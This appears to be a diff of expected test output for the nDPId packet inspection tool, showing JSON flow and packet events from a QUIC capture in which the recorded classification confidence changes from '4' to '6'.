BYNsFWF5Ai1oxBkmUGx9kWUDs80leQJlP0r7jJUvcdLFEZrISVVdyQaoJZQMMFPymMKeYyC4YzW1ORpCrB6TKj0+6uYFK1klVAzDEVUYF1Hhucybp0Qq\/MxedWLGVKQWT9257chXwP2PvqI7qxShbETVSxB44evGFNEZRr76ml\/LnDy58xg1d5gvwegl\/7+gkPhbIJMtvVZ+JkXETJtQnFRG1xeTTfchP0QvUjmmxpySWiNd6gaGLNTi33HeRHy8SHIM278nUZ9GMr0cdwZ08VWlOCTuhU3E2u1I\/6ZvxNK5D41TNPq02++dEJhlyjbw3keY6r\/soji\/n+9pmP7QmojV\/lfE3GxJ+ePOip0nlns4O8V5YSSKtilDr8GhCJyf\/pzZk3drO1EwJLp4rnbhLue2grZuQbO3+kxcT96eAE85Hb0noB3Ea+uU3gj5MXJ0wkPH06qnXVxrDVuFF03yGp55TKUZyKSkRVZizQRkR0CmmMb9p+7ighEtptb4miGyv2eDl9F+SDCwhUssSw7vl8IKL3NVUcKAYGcE7Ie2BdrDpWQqSHhL0i5ZWiHn2aNx9IPMwmexAO\/AP+DEpPg\/OqQFS9+cLRPrMs6a5TPZqg++wfD+EHXSSwEIbMZk7820Ent7o0O6fPU9oivUvzxIErtdOu9fjOuTeCbtNL0UGBzvnoRPMUaIQjfu\/iJG8Z9aOtg+9TrcjVPX5a6Z5OwLXmzLGRT86sNwHqCjRgn2p2rVLx+fb+Z3Te8nZPOzZZjVZ6Ycx5SyZ9mziyd8btUND9hahYJM6KENGcOZwT1hkXcbxXROTQMsrykz+appT+Yt7eTfiM5Bijfzp++ctCCHMYRqgsN0FBlmqroqwE0JLDBDcemxPFQhEjVYok4hZ20aOLFNcrukblRhA1kFXY6Llbu6x+OdQ5ITJjtfy6N7s1G"} -00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495406541,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 
+00954{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":126,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":87,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495406541,"flow_last_seen":1621495406541,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495406541,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"117.148.117.30","src_port":55572,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"},"quic": {"client_requested_server_name":"googleads.g.doubleclick.net","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00631{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495410048,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02322{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_packet_id":1,"flow_last_seen":1621495410048,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495410048,"pkt":"AAAAAAAAAAEAIHu5CABFAAViFgVAAH4RX\/eokEAFgPgYAeZMAbsFTtl+yf8AAB0I\/leLTB44CRYANwAjTks9G8lrwt7+vZI0DaJowcQhxAH\/31dnEp\/wJDdcMs+96OC39JlFREj+x7uN8Y8I9xFEQ29E\/a6s8tYEG9mj1POKhRa4vw3FhUteagxK+Q3DYpMRbbQyi17yakV5fz21hd995vaP89QVSqNLp+aAiSc+XqrCI77QXUHLmsP3G+aV40nY4QYlAWTLcidClJxeZyPxcfdcTtSNYicTl2FhoQfgv\/izTkA8Ux332SxyJP9+2z+XN09eJbN3mFulwha40\/Pg2JJnk0Mm\/3T\/Ss1Ch6I\/57GVqncRgavCBlhRoSVFKd86cw4yV+Ach6\/lwZDc5hjr3\/nqPDyHyOk\/ic1VUkphYEW41unlD7wuiEsRixbz8q3byugh+YjmzBN4Tq47QChINSRWxj4L+BjNAoQ7Dai2X97Gz1ilrfn9+zsFqOwEj79WLqBpmtfOV849tRu3LnfZ5cuX\/MO2LG86yC\/6+pLC3ANUDv1RY2PC7sUP7d+2w6wZL9lz84eJ4EUxCxoGhaeWNioxpuXz6QtLrdpqY2rZZMA1WHZDaqTSa2btkRbvpzj3eovzOuknue\/RfsdTXXW3UMOpsc9ufpxUOiIdmQDlR9ngWJJOEe\/+zAdRs4VCI3jg3b+MFDhTwkUDRbn5RdNBFGIFGiXMmlzBNp8WabWafrmaKncF2rHZrecxeLVQ\/VSRUDmEKuHw40u+BNDILthR2FlUDDPJIVa+8K5xsZq0GxABXMcW8oZDwrq5xqDJZgYviq8SMcVntUHd4lVflGxbnfbnq3u\/Fk2Q\/Bs6qxzEdrCtn5KxNf5RTEOp58JUv2EOmrI1dyD87\/vOZYoRo4zjmc5dfyfUed+U6qOKm9QNfz5t+khBm6EE0js0KEb\/+Q6\/FDW5NzexjAFt74fp26YEUcjbbOPT98MLJKLLZsudFAxnHc8sILQ7K7ykQTsjx+T\/KOD3Enwwk1Vj7wEx2TRnVYzj9HBoyE1hYdqsP+4XG4c9\/T3CYr8iPwgA\/aTTnUnOQGVq12dFIPyHfSU0aW1473o2COwUVCD0ADVE218fKQZESyx3lIauVAb53dvU3\/wIawiFCz3acy7VEwSNGNM4p1UV+gN+HBUKUPzY8exwOAX4I27APon\/2ahebhkhpVTALzP5\/h7a9YZDH7+4j+sDYvJYLFK1kStX9AMMkrOXJtGqYpqgjUKCp2ykQVjHn\/RRRes+WwM6iqH92nVkHIv21SOZ8nVM86HIxmxEKln1LCCgKmw2iOSzvtfGSozM0d\/so3uqMQgMEaBugSKzaJiIYwVfVibAbpN0adGCr0odL4i5Z+yx0AuzsZ+EDcPN67poLOsf7GSYwLDiQkVusGkT9qI\/+26abOUxBiwO5qIu4c3OtO9Pl6FwYcO91fZh650fsDdAhxQSRml+yPU29m5YVwysjHTEwUlh7bDdMFpdQdpdmP+YBhsc0SG8HbyUGUWAXz9
Q0pI6aQER6n+2b\/BjsFSwDoAdec89vuok0yzzVxihCQNqfDhwRMqvQlmf41fMjfoyQkvsYJMCbKU1y0ftuN2J8N7YcBgXEpkyZ73F9eUWeEUHAENs4C+x+znjGw\/xdKih19FGDi\/nhZNMlLhDpFyi82JaXj\/bLXeevjzdhjNvFrlWRduPD3Az3+Jt8O1Sm71ZcoDZgGY54gQ3OrsHryVHzWg9achFHZLn\/ZWA4PSjBQQH5WG6PFgfZhD+kj1oost9E1Z2g02u+oPqUAeEiw\/SGcRViFDskV2Cj6eFv\/nHh2vnTL8ODpgiQIs3IP3M"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495410048,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":127,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495410048,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"beacons.gcp.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} 00634{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02313{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_packet_id":1,"flow_last_seen":1621495455961,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495455961,"pkt":"AAAAAAAAAAEAaACzCABFAAVipjNAAH4RMkyokEAFZsLPs9SxAbsFTkz3yf8AAB0IW6VqPL9nKU0ANwBravUmWKq3yO8VZlOBqHgbki\/goI5n14Od4wyAZtlECAHCn0lzdaz8q7RFJaLaxg8bqaof4Y9E\/aCKkqi83SiSxj0wA9VaVnLuhoAUcP5pSIwdVZ226lDU\/fKJXCOWhj5U0vGsWctMBnACRJooqY\/EIe7zeS4gW9kRSye11BfEHBZvQCQ2Hw5tRRQO1ihfr3AH4BV+w18QXsSRjA3AgSLlWmVvNoGhvok75aqRHYiBSwdwNT9ZQk4cM6MThQObIM9OwmrZGYzdgcwWP\/FJvqDB39XhD+omQ8uC8mZ537oEh5AGXvor2yfynGKqmgp\/yT\/dH3topVKC+Ri4UD6+q6yMBizxV\/DHc+zcKb7bKMFFO1eiqXSiGPoIgEutHke5OqadU\/tLTj0WuUrML78PqgBRydLfJJ0hSojdqY\/HjdwJpZeFJwp7wKn8VRGG\/yvY2x6pil8wpOS6XvWHGvzNPxD6C+g5axKm9LfXWJkNn4V0vMRIJyOAoJsSgFe32K\/w60iIObURGr7LOTvgxY8kLZgGkxD8VmUWaxSsIipdY1zQzkND1VZO6t2zr\/a+Q8DohD1YPV6tlk6rn2prShAt77QE+pLlEwym
1HnxiPCdcDtyW285Nk7kKruQ1mmAdcp7hpBdeQ73zBfPFm4kViXEkOmKqu2y8u2C\/dbP6WGDVgmEt50G\/TZ0SMJ\/1lXGfmrpbdAKoOxB7xEdy35+vcwsE1YFswDl5TGR+NBvTqNrjHDXACh8Cx53IWP59Ji2saD1Ye50T1Sx5LgA6SrpWbOlU9Rsgq\/TBSC1tQOH\/VmrKAut\/8nukuPoNtb1a5uUZ1c6bwAcpjf5TXN41pCYm69SI3nssNWo2dyLqOGKECefwPxQf15zCZ8qa6BPFMjjc5uFw2+UZJ6H9uVGcT6YOn9ATJjXV1rWnhxewQVVeqNiTOey+tQF+cjBBZLReI34HshIV8r1nlrST\/qXbWAKh7GeUQmJneZZhYb81MJMByTb73VBZXoZ6xGgTNyP\/dHOTR22ecj1LOs0qstF2wN9snIQZrrfX2JlF7dq2fFSKEshmXaVGCEL09hXFhHbq0QayKuLAWWI4aRof11r+CNpR\/NJ0Aqs+i4pRrJnNm6t4IC1bx4FGU7Nyx6ngu+TrgAfLdooE51VAlTUl0v7zV2KYm5RDSEpj7PgcRIvT7QAwBPfzFQ4j+lIz1HgE2KmRziUtymSXUNSNgt2udtGTPaV2DAgGZS6qazUIKNzkZIQp8q6s4lL6Pqeb5LG4kvEOeCmxo5wEofaOGvytEr8++Td9tOdy3u+6tQw8ZChKbNfJKWxhoOFUIA\/5YBmZFZSccanTHvVJto7VxFojeJZukeioQQjJDwBPHsywE3BtR7h6oz5boguk9Kou14u\/5g66uwMCuxQDPrXZcoTZsZa2HLwy2qe0ExuzZPw2HHvmOyZSAGQ+m\/BLcAwWVL927E2hs76eRGuJwqsY4GpvrOX1CbGRhwTxeliklR36iagwOV6ZLPHJGQ8sRMQ6E+CPifdBY0km0DQvehrT8ZiGdH6wl7zf3ONaN9EN6wUYANIeHCXhN9ihBg9GaQHoAfGloAC1v5PK1ylIeuftjWmCPhso3b9DRFisYli57JTJDMeFP014yikgmjmgpEmF7DxSG5Mv\/1+EFTtCib5OrXYmTEQm\/5mM09hj8zz\/HhlKsiMfbdKKTGX6XSTEBKV9L0IiOMNuHkh9x0VXilYm+QFUtpSkJC0TjJiw\/HyVRyGEOuTm4Ep5gOdRAcfPf\/R3xVB"} -00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons3.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows 
NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} -00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 
+00935{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":128,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"beacons3.gvt2.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"78ba053b9aa352e84a4eea899207839a","tls_supported_versions":"TLSv1.3"}} +00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495274945,"flow_last_seen":1621495274945,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":60934,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 
+00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495262761,"flow_last_seen":1621495262761,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495455961,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"113.250.137.243","src_port":55479,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.GoogleServices","breed":"Acceptable","category":"Web"}} 00633{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02309{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_packet_id":1,"flow_last_seen":1621495692143,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1392,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1392,"pkt_l4_len":1358,"thread_ts_msec":1621495692143,"pkt":"AAAAAAAAAAEA4PSECABFAAViwhdAAH4RV5yokEAFXWSX3eu2AbsFTqlwy\/8AAB0IytRHE\/BcidkAAEU0GAJLgq5zWCEW\/\/vpneUqridEkoosXOYvPFM+EGFgFEn1\/pdK2U+fbOyyD9aMCeGUBOZnfvyIfNO5K6N10kJD2wSuJMaHeVG8mTehPz6Z7xoPc5LRNHFpJc9TdwBWwPbj8ekTbabDuVDHMstO8xpXRQySbhJHU6wlq+klfEbii+8EVostEJjHVEa1OZRyeAxcg1YEz+0PhQrslK4lhYtYjv4daqrQ9huOezEOwJKVIALQJLGoJ4f2F0eqzdy6jHFW4Shtit+AoF5iUPYyY6JmIGKfalz9t2vSbZumTgJ9SLPadk+rld6hE4IFunALh2k0HHlflWmsTcHH4jZndWLbu2r2iLUOBVoiQ18gEn8zCFncnoY4ExTQLd0WhsHz1w74Rs230gs\/qIzBbpiNnor68kH6+ahcqnABZBlXRVXYrQtqzWMVecwWgFBr8kmDHNSbEsffCTExI7CQu3mzEUOiFNDs51itYsXzdmE7wEGo\/bGYgZblzPEz8chYGofZflNVoia8KxZj\/VLWXLY06JYSw0TbdHU6OZKpIlgWKPSUU9yWUDPgULA8g0V45R6QNOWEv\/+Xd5aZdfeHnkBDVK8YnbuFxEkxeTLfnF0HSQd2toTv8gz1i8eq0knZewiX9Qyn6hzHgP2\/U+hh2ui9eIuBGqxzkvyg3DOjUT9WKjYnMvT3pNBH\/YoJtrPxSn7XrrXNYYWmNcxW4oxEIL7wiLLLL7liAYBvwS7FLIJepFUJ89bcXkCLsjkN63okoguLX+ND2ec7J9VukjZ+dXxDIqV16passDORQcQv+hP9S1RE1mHSFBJt3dWs3kSbeTxL0\/jUX9wUMKCAKJsmn1JHBtj3SRd+Cq7RST4KNBpNpp+OrN5GS8zmmRP02n0QZdRAA\/cP8cayAz44AqG8Nmgu6qpMXQlCEJbdSMX8zW66ZG3A\/wWBiO6fXKXtPqq0B+fcrDGzggFgJ7\/X1FeMde1oO1KvB7K5FnKUeH6z5iHps9E6+eItgN1w2M0OXrE++u9FVrWPH31W5YKQVZMpI0U7re5kVQMzV9bJRcBuHYng7XfhD8k8uOEA1mD8rAI2acFs1IU7+t6xL5xpLL17JhawgaF8\/SfwzgEFHaQcPkz8ipFK3FbfGt15dt4gZ2CzlxYp7RaoRsZiNmF1SVZhPHx7EKffzikgMDfyCfUTej4mHFjDSBXvSBw\/tLvSe9zKIGZzW4YW5Zx2kF14W03Knayi7As27e\/ETroLvHWX+zYXh8lsCjXblUbFLn4OvB4Vvl6g7osC7YpQr9UoDjSRAa6delKk\/ZUwvlsmVlVdxie6KoM9xa4Kzoe6ANfADEjk2L3bHvC3ibZLII1p03Itmuh1fVJvnQ4PqLPmYJ6J8fjwoTytcU64MeofEY0xuIazjFponK+zHprMee9E4a13UVbglxsx2ynEryvHU7P2C9n3y1sUu0MlUWwRaMb2msNlm84Pn7t+
d7khBduwQHoE47sarcouiL95rGRzCh6s8NudLolgOYJuEw4uamdMOpSbqhTz6in40vyUrVIdNnXic83DBKdCA+7fAJyj\/qP2NwPP5wjaudyfPKQUIUm\/ZWQd3dL20quz7Lifs+ZxH7e5Z79ubipc8483Vd9Aq+ZDmCrdC8DTUvYkNu8HRlFIJ\/87x6kDCqBpz\/Y6oKJ9fnDWzu3vGVK4nDx4jhx0IvaEpB8u7iVohyPAjcPcqis5bb\/b2l141\/Mkd7YUfg1edYX7s7jeiJZNXtRq20b9JPjsbcD\/aEE7zAWRgf9W"} -00948{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":129,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":90,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1621495692143,"flow_last_seen":1621495692143,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"93.100.151.221","src_port":60342,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"},"quic": {"client_requested_server_name":"suggestqueries-clients6.youtube.com","user_agent":"dev Chrome\/92.0.4503.3 Windows NT 10.0; Win64; x64","version":"TLSv1.3","alpn":"h3-29","ja3":"8b979b020e67a82c4f1f7f3932805dbb","tls_supported_versions":"TLSv1.3"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495395690,"flow_last_seen":1621495395690,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":64497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00730{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495372662,"flow_last_seen":1621495372662,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"103.179.40.184","src_port":49926,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.YouTube","breed":"Fun","category":"Media"}} -00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":85,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495383906,"flow_last_seen":1621495383906,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"137.238.249.2","src_port":57398,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Advertisement"}} 
-00732{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495410048,"flow_last_seen":1621495410048,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"128.248.24.1","src_port":58956,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} -00735{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":130,"source":"quic_frags_ch_out_of_order_same_packet_craziness.pcapng","alias":"nDPId-test","flow_id":89,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1621495455961,"flow_last_seen":1621495455961,"flow_idle_time":200000,"flow_min_l4_payload_len":1350,"flow_max_l4_payload_len":1350,"flow_tot_l4_payload_len":1350,"flow_avg_l4_payload_len":1350,"midstream":0,"thread_ts_msec":1621495692143,"l3_proto":"ip4","src_ip":"168.144.64.5","dst_ip":"102.194.207.179","src_port":54449,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"QUIC.Google","breed":"Acceptable","category":"Web"}} 